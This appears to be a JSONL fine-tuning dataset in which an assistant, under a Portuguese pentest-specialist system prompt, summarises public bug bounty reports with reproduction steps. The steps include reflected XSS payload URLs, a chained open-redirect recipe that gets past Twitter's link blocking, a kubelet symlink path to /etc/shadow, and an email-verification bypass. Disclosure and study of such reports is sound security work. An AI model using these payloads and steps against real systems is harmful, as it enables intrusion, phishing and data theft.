nlbi_1638029=ibxAVmtdEHzy/Y9u+BxnEAAAAAB308NLs7A3ARoQwyk4Cyrg; incap_ses_745_1638029=ddKxJtFthhy2IeNut8VWCvWPlF8AAAAACuwA/vpt+9dXQmj6hoxBWQ==; _gid=GA1.2.639811834.1603690260; _gac_UA-149943-47=1.1603691724.Cj0KCQjwxNT8BRD9ARIsAJ8S5xZC0_Hlxu0wgG7xA0-jU5eIi2BxoGFsRealW_kNcbHRyB_H8h3z-y0aAjFAEALw_wcB; AcronisSID.en=8a4d91ace2ecadca23dda91cdcb5abc5; AcronisUID.en=1438137573; _hjAbsoluteSessionInProgress=1; _uetsid=6d516b50174c11eb8ef2b18637bee740; _uetvid=b490e7509541648c67826dc18a0c7c46; _gat_UA-149943-47=1\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 26 Oct 2020 11:59:18 GMT\nContent-Type: application/json\nConnection: close\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\npragma: no-cache\nexpires: -1\nX-RateLimit-Limit: 100\nX-RateLimit-Remaining: 97\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, Cache-Control, Connection, DNT, Keep-Alive, If-Modified-Since, Origin, Save-Data, User-Agent, X-Requested-With, Content-Type\nAccess-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS\np3p: CP=IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-XSS-Protection: 1; mode=block\nContent-Length: 714\n```\nSee in response below,:\n```\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\n```\nAccess-Control-Allow-Credentials are true for Access-Control-Allow-Origin as *.acronis.com which makes Credentials true for all subdomains of acronis.com. 
Cross-Origin Resource Sharing (CORS) allows cross-domain access from all subdomains of acronis.com\n\nTherefore, by taking over listed subdomains or finding any XSS vulnerability in any of the listed subdomains can steal user information or read arbitrary data from the accounts of other users. \n\nThe Subdomain takeover allows various attacks.\n\n Malware distribution\n Phishing / Spear phishing\n XSS\n Authentication bypass\n ...\n\nList goes on and on. Since some certificate authorities (Let's Encrypt) require only domain verification, SSL certificate can be easily generated.\nAn attacker can utilize these domains for targeting the organization by fake login forms, or steal sensitive information of teams (credentials, information, etc)\n\nFIX & MITIGATION\n**You should immediately remove the CNAME entries for these domains or point it elsewhere if you don't use marketo services.**\n\nPlease let me know if more info needed or any help.\n\nBest Regards,\nAshmek"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Attacker can generate cancelled transctions in a user's transaction history using only Steam ID"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe API endpoint `/create-payment` requires only the steam ID of the account to create the payment. When this endpoint is called using the `cardpay` flow, it returns a transaction ID on the Cardpay system. 
The attacker can access this transaction, and immediately cancel it (or pay it ;) ), which leads to a visible cancelled transaction in the cs.money user's transaction history.\n\nAlthough there is no impact to the user, they will certainly be confused.\n\n### Passos para Reproduzir\nInvoke the API call `/create-payment` as below:\n\n```\nPOST https://cs.money/create-payment HTTP/1.1\nHost: cs.money\nContent-Type: application/json;charset=UTF-8\nCookie: steamid=████████; \n\n{\"merchant\":\"cardpay\",\"amount\":10}\n```\n\nYou will get a response with a Cardpay order ID and URL:\n```\nHTTP/1.1 200 OK\n...\n{\"merchant\":\"cardpay\",\"orderId\":2034944,\"success\":true,\"url\":\"https://cardpay.com/MI/payment.html?uuid=DaG438Bda6GC13h5db1bGD01\"}\n```\n\nYou can then cancel the payment by hitting the Cardpay cancel URL:\n```\nhttps://cardpay.com/MI/cancel.html?uuid=DaG438Bda6GC13h5db1bGD01\n```\n\nThis will result in a cancelled transaction showing in the user's transaction history of the amount specified by the attacker. The attacker could repeat this numerous times until the account is banned by cs.money (this occurred on one of my test accounts).\n\n### Impacto\nConfusion for the user due to the ability to create many cancelled transactions, potentially leading to the account being banned."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [Information Disclosure] Amazon S3 Bucket of Shopify Ping (iOS) have public access of other users image"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. 
Install Shopify Ping on your phone then enable Shopify Chat for your store.\n2. Go to your Shopify Store and start chatting as a customer. ███\n3. Log in to Staff account on Shopify Ping and click on send image ████████\n4. Back to Shopify Store as Customer and inspect the website code, you will find the URL of image ██████████ https://ping-api-production.s3.us-west-2.amazonaws.com/oks██████\n5. Now visit https://ping-api-production.s3.us-west-2.amazonaws.com, you can view all images of other stores. █████████\n\n### Impacto\nUsing this Bucket access, a hacker can steal all private images of other stores and the user who shared through Shopify Ping."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: password field autocomplete enabled"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n[Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.\nThe stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.]\n\n### Passos para Reproduzir\n[follow the steps]\n\n 1. [signup with the new details]\n 1. [go to login page]\n 1. 
[there we will see password details are automatically filled]\n\n### Impacto\nThis autocomplete password can be sniffed without user permission"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Brave Browser potentially logs the last time a Tor window was used"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nA vulnerability in the Brave Browser allows an attacker to view the last time a Tor session was used in incognito mode. A local, on-disk attacker could read the Brave Browser's \"Local State\" json file and identify the last time a Tor session was used, affecting the confidentiality of a user's Tor session.\n\nFor example, the \"Local State\" file of a user who has recently used a Tor session would list a key value pair with a timestamp as accurate as \"13248493693576042\". This allows an attacker to fingerprint, or prove beyond reasonable doubt, that a user was using Tor at that very specific moment in time.\n\n### Passos para Reproduzir\nStart a Tor session in Brave Browser\n\n### Impacto\nViolate the confidentiality of a user's Tor session."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Default behavior of Fastifys versioned routes can be used for cache poisoning when Fastify is used in combination with a http cache / CDN"}, {"role": "assistant", "content": "### Passos para Reproduzir\nGiven the following Fastify server:\n\n```js\nconst app = require('fastify')();\n\napp.get('/', async () => {\n return { hello: 'world' };\n});\n\nconst start = async () => {\n await app.listen(9000)\n}\nstart();\n```\n\nRequesting this as follow:\n\n```sh\ncurl -v http://localhost:9000\n```\n\nit outputs a HTTP 200 with the expected content:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< content-type: application/json; charset=utf-8\n< content-length: 17\n< Date: Tue, 03 Nov 2020 19:21:41 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"hello\":\"world\"}\n```\n\nThough, if we request the same route with an `Accept-Version` header:\n\n```sh\ncurl -v -H \"Accept-version: tada\" http://localhost:9000\n```\n\nit outputs a HTTP 404:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Accept-version: tada\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 404 Not Found\n< content-type: application/json; charset=utf-8\n< content-length: 72\n< Date: Tue, 03 Nov 2020 19:25:09 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to 
host localhost left intact\n{\"message\":\"Route GET:/ not found\",\"error\":\"Not Found\",\"statusCode\":404}\n```\n\nWhen a http cache / CDN are in front of such a server, an attacker can use this behavior to trigger caching of a 404 page on a legal route. Ex; A default Fastly (the CDN we use) or Varnish config will result in a cached 404 page with the above setup.\n\nWhen versioned routes are in use I also think that a `Vary` http header with `Accept-Version` as a value should be added to the response. That shall prevent a http cache / CDN from caching a 404 under the same cache key as a previous response.\n\nThough; to avoid this behavior when not using version routes I think it should be possible to turn off version routes. Is there an easy way to do so? Type a boolean on the constructor? Or do one need to write a custom version parser which according to doc affect performance?\n\nIts highly debatable if this is a security issue in Fastify, though, behavior of this might be worth having a second look at. Personally I was a bit surprised that versioned routes was a default behavior. I would expect it to be an opt in instead of opt out (if its possible to opt out).\n\n### Impacto\nAn attacker can use this cache poisoning to perform an attack where fully functionally URLs are replaced with 404's."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Exposed Configuration Files at https://www.exodus.io/keybase.txt"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nUsername, uid information is present in txt file.\n\n### Passos para Reproduzir\n1. 
Open This link https://www.exodus.io/keybase.txt \n 2. Search for username, uid\n 3. You will get some usernames with uid.\n\n### Impacto\nThis information may help attacker in further attacks."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS in https://███████ via hidden parameter \"████████\""}, {"role": "assistant", "content": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://███████/███████&███=TEST%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://█████████/█████████\n\nWith a little research, you can find a hidden parameter \"████████\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflexive XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. 
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS on https://███/████via hidden parameter \"█████████\""}, {"role": "assistant", "content": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://█████/████████&██████=XXX%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%20here%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://██████/guest/tls_sso.php\n\nWith a little research, you can find a hidden parameter \"███\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflected XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. 
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Read-only application can publish/delete fleets"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nTwitter released [Fleet](https://blog.twitter.com/ja_jp/topics/product/2020/ntroducing-fleets-new-way-to-join-the-conversation-jp.html) yesterday. This feature is working with few APIs, and these APIs are missing permission checks.\n\n### Passos para Reproduzir\n1. Install [twurl](https://github.com/twitter/twurl).\n 1. Authenticate as a read-only application.\n 1. Execute following command: `twurl /fleets/v1/create -X POST --header 'Content-Type: application/json' -d '{\"text\":\"Hey yo\"}'`\n 1. A fleet with `Hey yo` text will be created.\n\n### Impacto\nThe read-only application can publish fleets without getting Write permission. This issue has a similar impact to #434763"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Choose the target URL; let's take `https://ddosecrets.com` as an example.\n 2. Replace all occurrences of the ASCII period by the URL-encoded version of the [Ideographic Full Stop](https://unicode-table.com/en/3002/), i.e. `%E3%80%82`: `https://ddosecrets%E3%80%82com`.\n 3. URL-encode the result of step 2: `https%3A%2F%2Fddosecrets%25E3%2580%2582com`.\n 4. Append the result of step 3 to `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=` and append `%3F` to the result: `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=https%3A%2F%2Fddosecrets%25E3%2580%2582com%3F`.\n 5. URL-encode the result of step 4: `https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 6. Append the result of step 5 to `https://twitter.com/login?redirect_after_login=`: `https://twitter.com/login?redirect_after_login=https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 7. Log in to Twitter and tweet the URL resulting from step 6. Posting the tweet will succeed (but it shouldn't, if link validation were effective).\n 8. 
Click the malicious link in the tweet you just posted; you'll get redirected to the forbidden domain without being shown any Twitter interstitial page.\n\n(If you're not logged in to Twitter when you click the malicious link, you'll get prompted to log in, but you will still get redirected to the forbidden domain afterwards.)\n\n### Impacto\nAttackers can defeat [Twitter's approach to blocking links](https://help.twitter.com/en/safety-and-security/phishing-spam-and-malware-links) and post arbitrary unsafe links (starting with `https://twitter.com`, which really compounds the problem) in tweets."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Kubelet follows symlinks as root in /var/log from the /logs server endpoint"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nPrivilege escalation from a pod, to root read permissions on the entire filesytem of the node, by creating symlinks inside /var/log.\nThe kubelet is simply serving a fileserver at /var/log:\n\n_kubernetes\\pkg\\kubelet\\kubelet.go:1371_\n```golang\nif kl.logServer == nil {\n\t\tkl.logServer = http.StripPrefix(\"/logs/\", http.FileServer(http.Dir(\"/var/log/\")))\n\t}\n```\nThe kubelet naturally runs as root on the node, so this basically gives the ability for pods with write permissions to /var/log directory a directory traversal as a root user on the host (potentially taking over the whole cluster by getting secret keys)\nAn easy fix is checking the symlink destination, to figure out whether it is inside /var/lib/docker or other whitelisted paths to not break to mechanism of logs 
correlations\n\nA while back, I discovered this bug, when you didn't had the Bug Bounty program. \nI Published the following blog:\nhttps://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts\nDescribing the vulnerability.\n\n(it requires RBAC permissions to read logs, or a kubelet configured with AlwaysAllow. and a mount point to any child directory inside /var/log)\nI researched some log collectors projects in github, seems like alot of them are freely using this mount point.\nAs a user I would not imagine those projects can potentially take clusters.\n\n### Passos para Reproduzir\n1. create a pod with a mount path to `/var/log`\n 1. create a symlink in the mount point: `/var/log/rootfs_symlink -> /`\n 1. curl from within the pod: `https://:10250/logs/rootfs_symlink/etc/shadow`\n\n### Impacto\nRoot read permissions on the entire filesystem of the node"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: XSS in Email Input [intensedebate.com]"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI found an XSS in Email input. This input is not sanitized like other inputs allowing user to execute xss payloads.\n\n### Passos para Reproduzir\n1. Navigate to your account.\n2. In email address, add the below payload next to your email.\n`\">`\n\n### Impacto\nReflected XSS, An attacker can execute malicious javascript codes on the target application (email input specifically). 
It is highly recommended to fix this one because it is found in sensitive input (email).\n\nKind Regards."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Some build dependencies are downloaded over an insecure channel (without subsequent integrity checks)"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nBuild jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91) download dependencies from `build.openvpn.net` and `www.oberhumer.com`over an insecure channel (`http`, _not_ `https`) and do not check their integrity in any way.\n\nThis opens the door to person-in-the-middle attacks, whereby an attacker controlling an intermediate node on the network path between Travis CI's build servers and those two servers could manipulate traffic and inject his own malicious code into the artifacts produced by the two jobs in question.\n\n### Passos para Reproduzir\nThe `install` phase of the `.travis.yml` file [unconditionally executes](https://github.com/openvpn/openvpn/blob/master/.travis.yml#L120) the `.travis/build-deps.sh` script. If the following three conditions are satisfied,\n\n1. [the OS be other than `windows`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L4),\n2. [environment variable `SSLLIB` be set to `openssl`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L148), and\n3. 
[environment variable `CHOST` be set](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L161),\n\n(they are only satisfied for build jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91)), then shell functions `download_tap_windows` and `download_lzo` are executed [one](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L162) after the [other](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L165).\n\nShell functions `download_tap_windows` and `download_lzo` are defined above ([here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18) and [here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18), respectively) in `.travis/build-deps.sh`:\n\n```shell\ndownload_tap_windows () {\n if [ ! -f \"download-cache/tap-windows-${TAP_WINDOWS_VERSION}.zip\" ]; then\n wget -P download-cache/ \\\n \"http://build.openvpn.net/downloads/releases/tap-windows-${TAP_WINDOWS_VERSION}.zip\"\n fi\n}\n\ndownload_lzo () {\n if [ ! 
-f \"download-cache/lzo-${LZO_VERSION}.tar.gz\" ]; then\n wget -P download-cache/ \\\n \"http://www.oberhumer.com/opensource/lzo/download/lzo-${LZO_VERSION}.tar.gz\"\n fi\n}\n```\n\nNote that both `wget` commands use `http` as opposed to `https` ( though using `https` is readily possible, since both domains `build.openvpn.net` and `www.oberhumer.com` support `https` and have valid TLS certificates) .\n\n### Impacto\nThe two dependencies are downloaded over an insecure channel and, therefore, can be intercepted and tampered with by a person in the middle (controlling an intermediate node on the network path between Travis CI's build servers).\n\nMoreover, as no integrity checks seem to be performed after download, a person-in-the-middle attack would go undetected and could seriously compromise the integrity of the artifacts produced by those two build jobs.\n\nPlease do not dismiss the possibility of such an attack too quickly, as it is [not as far-fetched as one would think](https://medium.com/bugbountywriteup/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Email Verification bypass on signup"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThis bug is related to wordpress.com. There is feature in wordpress.com which allow users to invite people. We have to enter email address to invite that particular person but the invite link and invite key is also available to the person who invited. 
This allow attackers to create the profile without having access to the email address and they can make account on behalf of any people who is not already signed up in wordpress.com\n\n### Passos para Reproduzir\nThis issue can be reproduced by following these easy steps: \n* Login to your account on wordpress.com\n* Setup burpsuite proxy with browser.\n* Select your site and navigate to manage>people\n* Enter any email address which is not already registered in wordpress.com and invite\n* Open this url in browser: https://wordpress.com/people/invites/yoursite.wordpress.com [change yoursite.wordpress.com with your site]\n* See the burp suite proxy tab and find the GET request to this endpoint [https://public-api.wordpress.com/rest/v1.1/sites/siteId_here/invites?http_envelope=1&status=all&number=100] [there will be a number instead of siteId_here]\n* In response of this GET request you will see JSON which will be consisting of the details about the invitations sent and there you will find \"invite_key\" and \"link\".\n* Copy the link and open this in another browser.\n* You can create account on behalf of this email without having access to the email and email verification is bypassed :)\n\n**See the attached video for POC**\n\n### Impacto\nThis issue can be used to bypass email verification on signup. Attackers can create account on behalf on any person without having access to the email account. This issue is affecting integrity of the wordpress.com"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8284: trusting FTP PASV responses"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe issue here arises from the fact that curl by default has the option CURLOPT_FTP_SKIP_PASV_IP disabled by default.\nAs a result, an attacker controlling the URL used by curl, can perform port scanning on behalf of the server where curl is running.\nThis can be achieved by setting up a custom FTP server that would setup the data channel through the PASV command using the port scanning target IP and port in the PASV connection info. \nOne good target for this issue are web applications vulnerable to SSRF.\n\n### Passos para Reproduzir\nSo we can differentiate between open, closed and filtered ports with the following:\n1. Open ports\ncurl will reply with TYPE after the PASV command\nexample:\nReceived: USER anonymous in 5\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 6ms\n**Received: TYPE I in 6ms**\nReceived: SIZE whatever in 5ms\nReceived: RETR whatever in 5ms\n\n2. Filtered\ncurl will timeout after the PASV command\nexample:\nReceived: USER anonymous in 6\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 5ms\nReceived: in **1011ms**\n\n3. 
Closed\ncurl will close the control channel connection immediately after PASV\nexample:\nReceived: USER anonymous in 6ms\nReceived: PASS ftp@example.com in 6ms\nReceived: PWD in 5ms\nReceived: EPSV in 5ms\nReceived: PASV in 5ms\nReceived: in **5ms**\n\nIn the attachments, I have included an ftp server (F1088885) that automates these steps.\nUsage:\n./ssrf_pasvaggresvftp.sh -t 127.0.0.1/31 -p 80,8000-8100 -x ./ftp_curl.sh -vv\n\nthe file included in the -x option is supposed to trigger the ssrf on the target server that would lead to the call of curl with the attacker's URL. In this case we simulate the issue by calling curl locally. The attachment F1088859 is the script used in the example.\n\n### Impacto\nThrough the port scanning, an attacker could uncover services running in the internal network.\nIt could also be possible to perform version enumeration or other information disclosure if the attacker can get back the results of curl.\nFor example, an attacker points curl at host:22 for the data channel . If an ssh server is running on that host, then it will reply with its version which is then disclosed to the attacker.\n\nUltimately, this issue can be used as a stepping stone to launch further attacks on the vulnerable server."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] XSS Reflected POST-Based"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello, i have found a XSS Reflected POST-Based in `https://www.intensedebate.com/ajax.php`.\n\nVulnerable(s) URL :\n\n```POST /https://www.intensedebate.com/ajax.php```\n\nVulnerable(s) Parameter(s):\n\n```\n$_POST['txt'];\n```\n\nPayload\n\n```\nazertyuiop<<>\n```\n\n### Impacto\nA attacker can perform a phishing attack or perform a CORS attack"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Permanent DoS at https://happy.tools/ when inviting a user"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Using separate browsers or browser containers, login to two different accounts. At least one account should have admin privileges in order to invite users.\n2. In the other account under the [preferences tab](https://schedule.happy.tools/preferences), notice the user email, change the email to ``boy_child@wearehackerone.com`` and save changes.\n3. In the admin account under the [users tab](https://schedule.happy.tools/admin/users), click on ``Invite team members`` and input the email ``boy_child@wearehackerone.com``.\n4. Scroll down and click on ``Send invite``.\n5. The request will fail.\n6. 
Repeat steps 2 to 4, but changing the email to that of other users (test accounts) and the request to send an invite link will continuously fail.\n\n### Impacto\nThrough user enumeration of emails and mass exploitation, there is a permanent denial of service denying a Happy Tools admin from adding team members to their organization."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter"}, {"role": "assistant", "content": "### Passos para Reproduzir\nGo to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60`\n{F1092213}\n\n### Impacto\nThe attacker can execute JS code."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
